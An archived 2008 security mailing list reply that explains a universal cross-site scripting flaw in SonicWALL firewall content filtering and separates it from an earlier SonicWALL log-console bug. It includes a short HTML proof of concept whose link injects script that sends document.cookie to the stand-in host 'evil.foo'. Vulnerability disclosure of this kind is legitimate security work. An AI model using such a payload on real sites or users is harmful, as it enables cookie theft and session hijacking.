lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200811050757.mA57vg71003479@www5.securityfocus.com>
Date: Wed, 5 Nov 2008 00:57:42 -0700
From: unknown.pentester@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Re: Re: [Full-disclosure] Universal Website Hijacking by
 Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day

It is universal because any domain/website can be hijacked not because all vendors are affected! I never claimed that all vendors are affected.

Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects the web logs console of the appliance which means that exploitation is aimed at compromising the *device* NOT websites the victim user visits. 

Notice that the advisory says:

"the attacker may execute scripts automatically when the logfile is viewed."

The vuln I reported allows you to hijack any site. i.e.: run scripting code within the security context of any website. In other words, it's not a vulnerability that can be used to compromise the SonicWALL appliance, but rather to steal information from any sites (i.e.: active webmail session), steal cookies, etc ...

Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware site), but rather *swearing terms* need to be blocked. By simply inserting a swearing term (notice the f word) into any site's URL, script injection within that site is possible. i.e.:

<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/
'+document.cookie</script>">Click me!</a>
</body></html>

That's because the SonicWALL appliance replies on behalf of the requested site, so the browser "believes" that the inserted script is actually returned by the requested website. You could think of this as a MITM XSS.

Hope it makes sense.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ